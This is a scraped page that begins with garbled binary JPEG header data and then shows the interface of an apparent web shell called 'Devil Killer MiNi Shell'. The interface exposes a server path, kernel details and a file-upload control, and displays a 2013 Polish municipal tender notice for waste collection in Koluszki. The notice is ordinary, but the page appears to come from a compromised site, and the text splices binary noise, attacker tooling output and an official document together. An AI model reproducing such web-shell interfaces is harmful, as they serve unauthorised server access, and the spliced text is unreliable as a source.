JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/112539-N-2013.html

<p class="kh_header"><b>Koluszki: Odbieranie i  zagospodarowanie  odpadów komunalnych od  właścicieli  nieruchomości zamieszkałych  na  terenie  Gminy  Koluszki</b><br>
<b>Numer ogłoszenia: 112539 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i  zagospodarowanie  odpadów komunalnych od  właścicieli  nieruchomości zamieszkałych  na  terenie  Gminy  Koluszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest usługa  polegająca  na  odbieraniu  i zagospodarowaniu  odpadów komunalnych   z  nieruchomości   zamieszkałych  na  terenie  Gminy  Koluszki.  
Szczegółowy   zakres  zamówienia  obejmuje:
1.  Przy  zabudowie  jednorodzinnej :
1)  Odbieranie  i  zagospodarowanie  odpadów  komunalnych  z  posesji zamieszkałych  przez  osoby,  które zadeklarowały  prowadzenie  selektywnej  zbiórki  odpadów.  
2) Na  terenie  zabudowy  jednorodzinnej  obowiązywać  będzie system pojemnikowo - workowy  zbiórki  odpadów  komunalnych. 
3) W  zakres  wchodzi  postawienie 1 kosza na  śmieci  zmieszane  o  pojemności 120 litrów  przy każdej  posesji lub  gospodarstwie domowym zamieszkałych od 1do 4 osób, lub  2 koszy o pojemności 120 litrów na  śmieci przy posesji zamieszkującej  powyżej 4 osób.  
Szacunkowa  ilości  pojemników  do postawienia  wynosi: 7.500  sztuk.
4) Kosze te będą  nadal  własnością  Wykonawcy  i  powinny być  postawione przez Wykonawcę  na czas świadczenia  usług  odbierania  i  zagospodarowania  odpadów. W przypadku, gdy postawione  kosze o pojemności 120 litrów będą niewystarczające  śmieci  niesegregowane ( mieszane)  mogą  być wystawione  przez Właścicieli posesji  także w workach  lub  dodatkowych  koszach.
5) Kosze  na  odpady mieszane  powinny  być opróżniane  według  potrzeb  minimum  1 raz na  dwa  tygodnie  ( wg. harmonogramu  w uzgodnionym  dniu  tygodnia).   
6)  W  zakres zamówienia  wchodzi  również  odbieranie  i  zagospodarowanie odpadów  komunalnych  posegregowanych  takich  jak: szkło, plastik i  tworzywa sztuczne,  papier  i  tektura  oraz odpady biodegradowalne,  w  tym zielone.     
7) Odpady posegregowane  w workach powinny  być  odbierane  (wg harmonogramu  w uzgodnionym  dniu  tygodnia)  minimum 1 raz na miesiąc.
8) Dodatkowo  Wykonawca  świadczący  usługi  powinien  bezpłatnie  zapewnić  worki  do  selektywnej  zbiórki  odpadów w 4 kolorach:  zielony na  szkło 
i  opakowania szklane, żółty, na  tworzywa sztuczne  i  butelki  plastikowe, niebieski  na  papier  i  tekturę oraz brązowy na odpady biodegradowalne,  w  tym zielone. 
9) Wykonawca  powinien  uzupełnić  na  własny  koszt  worki do  selektywnej  zbiorki odpadów  komunalnych  po  każdorazowym odbiorze surowców  wtórnych  (szkło,  plastik i  tworzywa sztuczne, papier i tektura oraz odpady biodegradowalne  w  tym zielone)  poprzez pozostawienie  przy wejściu  na nieruchomość  nowych pustych worków w  dniu  odbioru selektywnie zebranych  odpadów. Zamawiający dopuszcza aby Wykonawca zastawił jedynie worki  odpowiadające liczebnie i kolorystycznie workom  odebranym. 
10)  Obowiązkiem  Wykonawcy,  gdy  zajdzie taka potrzeba będzie również  posprzątanie  wokół  pojemników  lub  koszy oraz zabranie  dostawionych przy pojemnikach  wszystkich  worków z niesegregowanymi  (zmieszanymi )  odpadami  komunalnymi. 
2.  Przy  zabudowie   jednorodzinnej:
1) odbieranie  i zagospodarowanie  odpadów  komunalnych  z posesji zamieszkałych  przez osoby,  które nie  zadeklarowały  prowadzenia  selektywnej  zbiórki odpadów.
2) W zakres  zamówienia  wchodzi  postawienie 1 kosza  na  śmieci  mieszane 
o pojemności 120 litrów przy każdej posesji lub gospodarstwie domowym zamieszkałym od 1 do 4 osób,  lub 2 koszy na śmieci o  pojemności 120 litrów przy  posesji  zamieszkującej  powyżej 4 osób. 
3) Szacunkowa  ilości  pojemników  do  postawienia  wynosi  500 sztuk.  
Kosze te będą nadal  własnością  Wykonawcy  i  powinny być  postawione przez Wykonawcę na czas świadczenia  usług  odbierania  i  zagospodarowania  odpadów. 
4) Kosze na odpady zmieszane  powinny  być opróżniane  według  potrzeb  minimum   1 raz na dwa  tygodnie  ( wg. harmonogramu  w uzgodnionym  dniu  tygodnia).   
W przypadku, gdy postawione  kosze o pojemności 120 litrów będą niewystarczające  śmieci  niesegregowane (mieszane)  mogą  być wystawione  przez Właścicieli posesji  także  w  workach  lub  dodatkowych  koszach. 
5) Obowiązkiem  Wykonawcy,  gdy zajdzie taka potrzeba będzie również posprzątanie  wokół  pojemników  lub  koszy  oraz zabranie dostawionych przy pojemnikach  wszystkich  worków  z niesegregowanymi  ( zmieszanymi )  odpadami komunalnymi. 
3. Przy  zabudowie   wielorodzinnej:
1)  Odbieranie  i  zagospodarowanie  odpadów  komunalnych  (zmieszanych)  
z  koszy znajdujących  się  przy budynkach  wielorodzinnych.  
2) W zakres zamówienia  wchodzi  także  postawienie  koszy  na  odpady komunalne zmieszane  o  pojemności  1100 litrów  w  wyznaczonych   miejscach  przy  budynkach  wielorodzinnych  w  szacunkowej  ilości  do  200  pojemników.  
3) Kosze te  będą nadal  własnością  Wykonawcy  i  powinny być  postawione przez Wykonawcę  na  czas świadczenia  usług  odbierania  i  zagospodarowania  odpadów.  
4) Kosze  na  odpady  komunalne  ( mieszane)  powinny  być  opróżniane  według  potrzeb  jednak  nie  rzadziej  niż  2  razy w  tygodniu  ( wg  harmonogramu  
w  uzgodnionych  z  zarządcami  budynków wielorodzinnych w  dniach  tygodnia).  
5) Obowiązkiem  Wykonawcy, gdy zajdzie taka potrzeba będzie również posprzątanie  wokół  pojemników  lub  koszy oraz zabranie dostawionych przy  pojemnikach wszystkich worków  z niesegregowanymi  ( zmieszanymi )  odpadami  komunalnymi  i  utrzymanie  pojemników  w należytym  stanie  sanitarnym.
4. Przy  zabudowie  wielorodzinnej:
1) Odbieranie i  zagospodarowanie  odpadów  komunalnych  posegregowanych 
ze  wszystkich  koszy o  pojemności  0,8 m 3 - 2,5m 3  znajdujących się  
w  wyznaczonych miejscach  w  pobliżu  budynków  wielorodzinnych.  
2) Kosze  na  posegregowane  odpady komunalne  powinny  być opróżniane  według  potrzeb jednak nie  rzadziej  niż  minimum  1 raz w  tygodniu  ( wg. harmonogramu 
w  uzgodnionym  dniu  tygodnia).
3) W  zakres zamówienia  wchodzi  także  postawienie  przez Wykonawcę 
w  wyznaczonych  miejscach  w  szacunkowej  ilości do 100 kompletów  dużych  koszy  o pojemności  0,8 m3 - 2,5m3  przystosowanych do selektywnej  zbiórki  odpadów  takich  jak: szkło, plastik  i  tworzywa sztuczne,  papier  oraz odpady  biodegradowalne,  w  tym zielone  i  ich  sukcesywnym  opróżnianiu.
4) Na  komplet  pojemników  składają się  4 pojemniki  na  różne  surowce  wtórne  takie  jak: szkło,  plastik  i  tworzywa sztuczne,  papier oraz tektura i odpady biodegradowalne,  w  tym zielone.
5) Kosze  te  powinny  być  postawione przez Wykonawcę  na  czas realizacji usługi  
i  są jego własnością  a  po zakończeniu  świadczenia  zawartej umowy  będą mogły  być  zabrane przez Wykonawcę.
6) Dodatkowo  Gmina  Koluszki  dysponuje  14  kompletami  koszy o pojemności  
0,8 m3 - 2,5 m3 przystosowanymi  do selektywnej  zbiórki  odpadów komunalnych  takich  jak: szkło, plastik i  tworzywa  sztuczne.   Kosze  te będą  też postawione  
w  wybranych  miejscach  w pobliżu  budynków  wielorodzinnych  i  powinny  być  opróżniane  przez Wykonawcę,  a  odpady  te zagospodarowane. 
7) Obowiązkiem  Wykonawcy, gdy zajdzie taka potrzeba będzie również posprzątanie wokół  pojemników  lub  koszy  oraz zabranie dostawionych  przy  pojemnikach worków  z prawidłowo  posegregowanymi  odpadami  komunalnymi  i  utrzymanie pojemników w należytym  stanie  sanitarnym.
5.  Punkt   Selektywnej  Zbiórki  Odpadów  Komunalnych:
1) Sukcesywne  odbieranie  i  zagospodarowanie  odpadów  z  punktu  Selektywnej  Zbiórki Odpadów Komunalnych (SZOK) takich  jak: odpady  niebezpieczne (chemikalia) w ilości do 5 ton, baterii i akumulatorów w ilości do 1 tony,  mebli 
i  innych  odpadów  wielkogabarytowych w ilości do 20 ton, zużytego sprzętu elektrycznego  i elektronicznego w ilości do 5 ton,  zużytych opon w  ilości  do 5 ton,  materiałów budowlano- remontowych i  rozbiórkowych w ilości 30 ton,  metali  w  tym opakowaniowych w ilości  3 ton.
2) Materiały  te  będą  zeskładowane i  posegregowane  przez Gminę  Koluszki  
i  będą do odbioru  sukcesywnie  w  miarę ich  nagromadzenia.
Należy przyjąć, że odbiór z  Punktu Selektywnej Zbiórki Odpadów Komunalnych poszczególnych  rodzajów odpadów będzie następował  nie częściej niż 1 raz na miesiąc.
3) Gminny  punkt  Selektywnej  Zbiórki Odpadów Komunalnych  ( SZOK)  będzie utworzony  przy składowisku  odpadów  mieszczącym się w Koluszkach  przy  
ul. Reymonta. Zamawiający rozważa  możliwość gromadzenia niektórych rodzajów odpadów  także na terenie Zakładu Usług Komunalnych  w  Koluszkach przy  
ul.  Mickiewicza 4.
4) Selektywna  Zbiórka Odpadów Komunalnych  będzie  prowadzona  przez Zakład  Usług  Komunalnych  w  Koluszkach, a  Wykonawca  wybrany  w niniejszym  przetargu będzie tylko odbierał  posegregowane  odpady i  je dalej zagospodarowywał. 
6.  Inne  obowiązki  Wykonawcy:
1) Worki  do selektywnej  zbiórki odpadów  powinien  bezpłatnie  zapewnić  Wykonawca.  Worki  powinny  posiadać następujące  parametry: wykonane  z foli polietylenowej  o grubości  zapewniającej  wytrzymałość  worków. 
Pojemność  worków  minimum  60 litrów.
2) Worki  powinny  być  półprzezroczyste  w  4  kolorach: zielony  na  szkło 
i  opakowania szklane,  żółty na  tworzywa sztuczne  i  butelki  plastikowe, niebieski  na  papier i  tekturę oraz brązowy na odpady biodegradowalne,  w  tym zielone.
3) Większą  ilość worków należy  zostawić  w  siedzibie Urzędu  Miejskiego 
w Koluszkach  oraz w  punkcie  Selektywnej  Zbiórki  Odpadów Komunalnych  tak, aby osoby chętne  mogły  według  potrzeb pobrać dodatkowe  worki  na  odpady  posegregowane.
7. Sporządzanie  miesięcznych  sprawozdań  celem monitorowania  świadczonych  usług  oraz  informowania  Zamawiającego  o wszelkich:  problemach i  zauważonych  nieprawidłowościach  w trakcie świadczenia  usług  odbioru odpadów  komunalnych,  a  w szczególności :  nieprawidłowego  sortowania  odpadów  komunalnych,
nadmiernej  ilości  wytwarzanych odpadów niewspółmiernych do ilości zamieszkałych  osób na danej posesji, lub  innych  zaistniałych  problemach. 
W  przypadku  dokonania  przez  Wykonawcę  takiego  zgłoszenia, Zamawiający  zweryfikuje  przekazaną  informację  i podejmie stosowne  kroki oraz przeprowadzi  kontrolę  celem  ich  wyeliminowania  lub  ograniczenia  w  przyszłości. 
8. Sporządzanie i przekazanie Zamawiającemu  kwartalnych sprawozdań  zgodnie  z Rozdziałem 4b ustawy  z dnia 13 września 1996 r. o utrzymaniu  czystości 
i  porządku  w gminach  (Dz. U. z 2012 r. poz. 391 z późniejszymi  zmianami), 
9. Miejsce realizacji: 
cały teren Gminy Koluszki obejmujący następujące miejscowości : Będzelin, Borowa, Długie,  Erazmów, Felicjanów,  Gałków  Duży,  Gałków Mały, Gałkówek Parcela, Jeziorko, Kaletnik,  Katarzynów,  Kazimierzów, Koluszki, Leosin, Lisowice, Nowy Redzeń, Przanowice, Regny, Różyca, Słotwiny,  Stamirowice, Stary Redzeń, Stefanów, Świny, Turobowice, Wierzchy, Zielona Góra, Zygmuntów, Żakowice..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.51.12.00-4, 90.51.20.00-9, 90.51.32.00-8, 90.51.40.00-3, 90.52.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy  Wykonawca  przystępujący  do niniejszego  przetargu  zobowiązany  jest  do wniesienia  wadium  przetargowego  w  wysokości :   10. 000,00  zł   słownie:  dziesięć tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu  dokonywania  oceny  spełnienia  tego  warunku. 
Zamawiający  uzna  ten  warunek  za  spełniony  na podstawie  podpisanych  oświadczeń:  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których  mowa  
w  art. 22 ust. 1  i  braku  podstaw  do wykluczenia   w oparciu o  art. 24 ust. 1 pkt. 2   Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru  lub  Centralnej  Ewidencji  i  Informacji o Działalności Gospodarczej  Rzeczpospolitej Polskiej,  jeżeli odrębne przepisy wymagają  wpisu  do  rejestru lub  ewidencji   wystawionego  nie  wcześniej  niż  6 miesięcy  przed upływem  terminu  składania  ofert  oraz,  gdy Wykonawca  posiada  aktualne:
a)  zezwolenie  na  transport  odpadów  objętych  przedmiotem zamówienia, które 
to  zezwolenie udzielane  jest zgodne z przepisami ustawy  z dnia 14 grudnia 2012 r. 
o odpadach  ( Dz. U.  2013.21),
b) wpis do  rejestru działalności  regulowanej  w zakresie odbieranie  odpadów  komunalnych od  właścicieli  nieruchomości,
c) zaświadczenie  o  wpisie  do  Rejestru  podmiotów  zbierających  zużyty  sprzęt
elektryczny  i  elektroniczny,  prowadzonego  przez Głównego  Inspektora Ochrony
Środowiska  zgodnie  z  ustawą  z dnia 29  lipca 2005 r. o  zużytym  sprzęcie
Elektrycznym  i elektronicznym  ( Dz. U. 2005. 180. 1495  ze zmianami ).
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu  dokonywania  oceny spełnienia tego  warunku. 
Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu  dokonywania  oceny spełnienia tego  warunku. 
Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu  dokonywania  oceny spełnienia tego  warunku. 
Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis  sposobu  dokonywania  oceny spełnienia  tego  warunku. 
Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego oświadczenia  o  spełnieniu   warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych,  oraz  gdy  Wykonawca  posiada  opłaconą  polisę  a w przypadku  jej  braku  inny  dokument  potwierdzający, 
że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w zakresie prowadzonej  działalności   związanej  z przedmiotem zamówienia  na  równowartość  minimum  200.000  złotych  ( PLN)   słownie:  dwieście  tysięcy złotych.
Gdy  opłacona  polisa  a w przypadku  jej  braku  inny  dokument  potwierdzający,  
że  Wykonawca  posiada  ubezpieczenie  od  odpowiedzialności  cywilnej  w zakresie prowadzonej  działalności  związanej  z przedmiotem zamówienia  będzie w  walutach  obcych, przeliczenie  kwoty  tej  waluty  na  złotych  (PLN) nastąpi  po  średnim  kursie  Narodowego  Banku  Polskiego  obowiązującym  w  dniu  opublikowania  ogłoszenia  o  zamówieniu  w  Biuletynie  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń  na  zasadzie :  spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Wypełniony  formularz  oferty   
2)  Wypełniony  formularz  cen  jednostkowych 
3)  W  przypadku,  gdy  podmioty  występują  wspólnie  Wykonawcy  powinni  ustanowić  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o udzielenie zamówienia,  albo  reprezentowania  w  postępowaniu i zawarcia umowy  
w  sprawie  zamówienia  publicznego.  Pełnomocnictwo  powinno  być  w formie oryginału  lub  kopii  poświadczonej  przez  notariusza.
4) W  przypadku,  gdy  Wykonawca  będzie  polegał  na   wiedzy  i  doświadczeniu, potencjale  technicznym, osób zdolnych do wykonania zamówienia  lub zdolnościach  finansowych  innych  podmiotów,  zobowiązany  jest udowodnić zamawiającemu  iż  będzie dysponował  zasobami  niezbędnymi do realizacji zamówienia,  w szczególności  przedstawiając w tym celu  pisemne zobowiązanie  tych podmiotów  do oddania  mu do dyspozycji niezbędnych  zasobów  na  okres  korzystania  z  nich  przy wykonywaniu  zamówienia.   
5) W  przypadku,  gdy  Wykonawca  polega  na  zasobach  innych  podmiotów,  musi  wykazać   Zamawiającemu,  że stosunek  łączący wykonawcę  z  tymi podmiotami gwarantuje  rzeczywisty dostęp do ich zasobów. Na  potwierdzenie  powinien załączyć dokument  określający sposób wykorzystania  zasobów innego podmiotu  przez  Wykonawcę  przy  wykonywaniu  zamówienia  oraz  charakter  stosunków  jaki będzie  łączył wykonawcę  z  innym  podmiotem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
